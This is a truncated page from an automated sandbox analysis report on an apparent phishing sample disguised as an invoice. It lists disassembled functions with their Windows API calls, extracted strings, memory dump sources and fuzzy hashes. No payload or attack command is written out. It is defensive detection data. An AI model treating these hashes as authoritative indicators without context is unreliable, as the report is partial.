                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              • Opcode ID: 8d535e7edcd815cdb06d22df0323e04dca896ccfddab549d7c438903c11ce2c3
                                                              • Instruction ID: decc44569897424796c660ce8f84b34d14a95376d328a962ae21d4a35bc73365
                                                              • Opcode Fuzzy Hash: 8d535e7edcd815cdb06d22df0323e04dca896ccfddab549d7c438903c11ce2c3
                                                              • Instruction Fuzzy Hash: D5618A75910208EFDB20DFA8DC81EEEB7B8EF09700F10415AFE14A7291D770A9A6DB54
                                                              Function 002294E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 002294FE
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00229549
                                                              • VariantInit.OLEAUT32(?), ref: 0022955B
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0022957B
                                                              • VariantCopy.OLEAUT32(?,?), ref: 002295BE
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 002295D2
                                                              • VariantClear.OLEAUT32(?), ref: 002295E7
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 002295F4
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002295FD
                                                              • VariantClear.OLEAUT32(?), ref: 0022960F
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0022961A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: 10d9d8c3142efbfd72b4bceff495e232060e7aa0dd1bbf89b85cb146abc0de86
                                                              • Instruction ID: 6b689ad880e5c23464c58bd9a55a47e5f438e11fc6bc0577429281fb4cc51e3f
                                                              • Opcode Fuzzy Hash: 10d9d8c3142efbfd72b4bceff495e232060e7aa0dd1bbf89b85cb146abc0de86
                                                              • Instruction Fuzzy Hash: 2C415171E10219AFCB01EFE4E8589DEBBB9FF08354F108065E505A3251DB71EA95CFA1
                                                              Function 0024BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$_memset
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?*$|?*
                                                              • API String ID: 2862541840-294147683
                                                              • Opcode ID: 247e37dfac298ceb49a83bcdbff3b83f202b5ac31e33b893012d4d8c10425d3c
                                                              • Instruction ID: 32ab1ca824ecabe07b9bc8bb4c43bdca21f9e92988a16397ed0e307f044e6170
                                                              • Opcode Fuzzy Hash: 247e37dfac298ceb49a83bcdbff3b83f202b5ac31e33b893012d4d8c10425d3c
                                                              • Instruction Fuzzy Hash: CF916C71E20219EFDB29CFA5C884FAEB7B8EF45710F10855AF515AB180DB709954CFA0
                                                              Function 0024ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • CoInitialize.OLE32 ref: 0024ADF6
                                                              • CoUninitialize.OLE32 ref: 0024AE01
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0027D8FC,?), ref: 0024AE61
                                                              • IIDFromString.OLE32(?,?), ref: 0024AED4
                                                              • VariantInit.OLEAUT32(?), ref: 0024AF6E
                                                              • VariantClear.OLEAUT32(?), ref: 0024AFCF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 834269672-1287834457
                                                              • Opcode ID: e555b3c72c6fd99589c203bcaaf16e6dc190cde682f8674df9ff0ef0b6835b70
                                                              • Instruction ID: d6d44072473cb117e5904580388f90fd586cc5d7d12c9c90ff639f5708ad9bfe
                                                              • Opcode Fuzzy Hash: e555b3c72c6fd99589c203bcaaf16e6dc190cde682f8674df9ff0ef0b6835b70
                                                              • Instruction Fuzzy Hash: 9C61BDB1268312EFD715EF64D849B6EB7E8AF89700F004419F9859B291C7B0ED58CB93
                                                              Function 00248107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00248168
                                                              • inet_addr.WSOCK32(?,?,?), ref: 002481AD
                                                              • gethostbyname.WSOCK32(?), ref: 002481B9
                                                              • IcmpCreateFile.IPHLPAPI ref: 002481C7
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00248237
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0024824D
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 002482C2
                                                              • WSACleanup.WSOCK32 ref: 002482C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: 548821189d0445e2ef3a922303020365eba349f19cee83ed7ae268a13efa2123
                                                              • Instruction ID: bbd3bae5fc4807ff3ee1d43a7b489925685913217550a48280ca6f35ebfec6f8
                                                              • Opcode Fuzzy Hash: 548821189d0445e2ef3a922303020365eba349f19cee83ed7ae268a13efa2123
                                                              • Instruction Fuzzy Hash: 8951B1316207019FD724EF24DC49B2EB7E4BF48310F04492AFA5ADB2A1DBB0E854CB41
                                                              Function 0023E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0023E396
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0023E40C
                                                              • GetLastError.KERNEL32 ref: 0023E416
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0023E483
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              • Opcode ID: 0a8df1740b1b4bb48d8a3f641ab84d6053c132bee32f547080b4d78bf74f85b3
                                                              • Instruction ID: 9e2775bbdcc2aa8ddc8817a6f007bf7c6743d4c82cef663793978e0b57263001
                                                              • Opcode Fuzzy Hash: 0a8df1740b1b4bb48d8a3f641ab84d6053c132bee32f547080b4d78bf74f85b3
                                                              • Instruction Fuzzy Hash: 7E31D475A2020A9FDB00EFA4DD45ABDB7B4EF59300F158026F605A72D1DB709915CB80
                                                              Function 0022B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0022B98C
                                                              • GetDlgCtrlID.USER32 ref: 0022B997
                                                              • GetParent.USER32 ref: 0022B9B3
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0022B9B6
                                                              • GetDlgCtrlID.USER32(?), ref: 0022B9BF
                                                              • GetParent.USER32(?), ref: 0022B9DB
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0022B9DE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              • Opcode ID: f43b87aa4e70000b5c28677a1a88292a691bcad7f174fc80cb2ba078a18312e3
                                                              • Instruction ID: 0b9556f247aaa9dcc7c606281cf049ae2325438763de64e4f2adbb756b3d2d5b
                                                              • Opcode Fuzzy Hash: f43b87aa4e70000b5c28677a1a88292a691bcad7f174fc80cb2ba078a18312e3
                                                              • Instruction Fuzzy Hash: CE21C4B4900108BFDB05AFA4EC85EFEBB78EF55310B100116F655A3292DBB45865DF60
                                                              Function 0022B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0022BA73
                                                              • GetDlgCtrlID.USER32 ref: 0022BA7E
                                                              • GetParent.USER32 ref: 0022BA9A
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0022BA9D
                                                              • GetDlgCtrlID.USER32(?), ref: 0022BAA6
                                                              • GetParent.USER32(?), ref: 0022BAC2
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0022BAC5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              • Opcode ID: fea017c4c2ea4d6e534ab6066384d73af653a1964811c09ad517eee6527761a7
                                                              • Instruction ID: 4ee0a7b044bec3e547ef3ef8e046e0784a5a93de599257b5752fd1df7c013e65
                                                              • Opcode Fuzzy Hash: fea017c4c2ea4d6e534ab6066384d73af653a1964811c09ad517eee6527761a7
                                                              • Instruction Fuzzy Hash: 1021D7B4900118BFDB01EFA4EC85EFEBB79EF45300F100015F555A7192DBB55969DB60
                                                              Function 0022BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32 ref: 0022BAE3
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 0022BAF8
                                                              • _wcscmp.LIBCMT ref: 0022BB0A
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0022BB85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1704125052-3381328864
                                                              • Opcode ID: 26f6040f3eb1a63adc4d4c9f176606db9531ec5caab52912b86c8f1792a67290
                                                              • Instruction ID: 28ca155e0754e60fb9368153da3a2d5dac7ff83e4107ffec0fc999858dc7ee36
                                                              • Opcode Fuzzy Hash: 26f6040f3eb1a63adc4d4c9f176606db9531ec5caab52912b86c8f1792a67290
                                                              • Instruction Fuzzy Hash: 2C110A76638313FAFA216A75FC0BDE6379C9F22728B200012FD05E44D6EFE158B15914
                                                              Function 0024B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0024B2D5
                                                              • CoInitialize.OLE32(00000000), ref: 0024B302
                                                              • CoUninitialize.OLE32 ref: 0024B30C
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0024B40C
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0024B539
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0024B56D
                                                              • CoGetObject.OLE32(?,00000000,0027D91C,?), ref: 0024B590
                                                              • SetErrorMode.KERNEL32(00000000), ref: 0024B5A3
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0024B623
                                                              • VariantClear.OLEAUT32(0027D91C), ref: 0024B633
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID:
                                                              • API String ID: 2395222682-0
                                                              • Opcode ID: a16c4f18392446122be4ea9c63a72198808e215ef265d738c65502d6e183cb05
                                                              • Instruction ID: 19695e190ce4ad936ca791aeb149670ecd34622d5bffc1d3291cb5e5548ae849
                                                              • Opcode Fuzzy Hash: a16c4f18392446122be4ea9c63a72198808e215ef265d738c65502d6e183cb05
                                                              • Instruction Fuzzy Hash: B5C133B1618305AFC705EF68C88492BBBE9FF88308F00495DF58A9B251DB71ED15CB92
                                                              Function 0021ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __lock.LIBCMT ref: 0021ACC1
                                                                • Part of subcall function 00217CF4: __mtinitlocknum.LIBCMT ref: 00217D06
                                                                • Part of subcall function 00217CF4: EnterCriticalSection.KERNEL32(00000000,?,00217ADD,0000000D), ref: 00217D1F
                                                              • __calloc_crt.LIBCMT ref: 0021ACD2
                                                                • Part of subcall function 00216986: __calloc_impl.LIBCMT ref: 00216995
                                                                • Part of subcall function 00216986: Sleep.KERNEL32(00000000,000003BC,0020F507,?,0000000E), ref: 002169AC
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0021ACED
                                                              • GetStartupInfoW.KERNEL32(?,002A6E28,00000064,00215E91,002A6C70,00000014), ref: 0021AD46
                                                              • __calloc_crt.LIBCMT ref: 0021AD91
                                                              • GetFileType.KERNEL32(00000001), ref: 0021ADD8
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0021AE11
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1426640281-0
                                                              • Opcode ID: 34a0251aafa2b9dcd0638a2e7d5883c2ef20f52bb7cea4ea1294fc5da940bf1a
                                                              • Instruction ID: 11023f4ce4f84771d9c33afa059606a34fb1a4b47510131b944dc6cd29f52a92
                                                              • Opcode Fuzzy Hash: 34a0251aafa2b9dcd0638a2e7d5883c2ef20f52bb7cea4ea1294fc5da940bf1a
                                                              • Instruction Fuzzy Hash: A581D2709267468FDB24CF68D8845EEBBF0AF25320B24436DD4A6AB3D1C7359893CB51
                                                              Function 0026DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 0020B496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0020B4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 0020B4B5
                                                              • GetStockObject.GDI32(00000005), ref: 0020B4BD
                                                              • GetClientRect.USER32(?), ref: 0026DD63
                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0026DD7A
                                                              • GetWindowDC.USER32(?), ref: 0026DD86
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0026DD95
                                                              • ReleaseDC.USER32(?,00000000), ref: 0026DDA7
                                                              • GetSysColor.USER32(00000005), ref: 0026DDC5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                              • String ID:
                                                              • API String ID: 3430376129-0
                                                              • Opcode ID: 47f43a8f7fc93d4ffd5222bae80a83f0d7ea0d608c06eb701cb7187a8d93be05
                                                              • Instruction ID: 5fa0ce4fc18a9ed01ab7434c35053174f84f9f853fb321df41b0c89ce06d5fac
                                                              • Opcode Fuzzy Hash: 47f43a8f7fc93d4ffd5222bae80a83f0d7ea0d608c06eb701cb7187a8d93be05
                                                              • Instruction Fuzzy Hash: 16115B31510206EFDB216FB4FC0CBA97B75EF04325F508665FA6AA50E2CB720A91DF20
                                                              Function 001F3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001F30DC
                                                              • CoUninitialize.OLE32(?,00000000), ref: 001F3181
                                                              • UnregisterHotKey.USER32(?), ref: 001F32A9
                                                              • DestroyWindow.USER32(?), ref: 00265079
                                                              • FreeLibrary.KERNEL32(?), ref: 002650F8
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00265125
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: 41cc0e83a9805a2f94c9b7b1aa2f3084e067d2a866d8213313a317179087a180
                                                              • Instruction ID: 8b1f0304a23833ff7c0bf3a64b2d15f1a8f60ddd86b64a19f9eed75454ed3741
                                                              • Opcode Fuzzy Hash: 41cc0e83a9805a2f94c9b7b1aa2f3084e067d2a866d8213313a317179087a180
                                                              • Instruction Fuzzy Hash: 0291293461021ACFC719EF14D899B78F3A4BF15304F5542A9E61AA7262DF30AE6ACF50
                                                              Function 0020CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 0020CC15
                                                                • Part of subcall function 0020CCCD: GetClientRect.USER32(?,?), ref: 0020CCF6
                                                                • Part of subcall function 0020CCCD: GetWindowRect.USER32(?,?), ref: 0020CD37
                                                                • Part of subcall function 0020CCCD: ScreenToClient.USER32(?,?), ref: 0020CD5F
                                                              • GetDC.USER32 ref: 0026D137
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0026D14A
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0026D158
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0026D16D
                                                              • ReleaseDC.USER32(?,00000000), ref: 0026D175
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0026D200
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: ecbb72a7074d6ac806f1528bf5f82c4f6a94e226a43bcadd241822de73b23db4
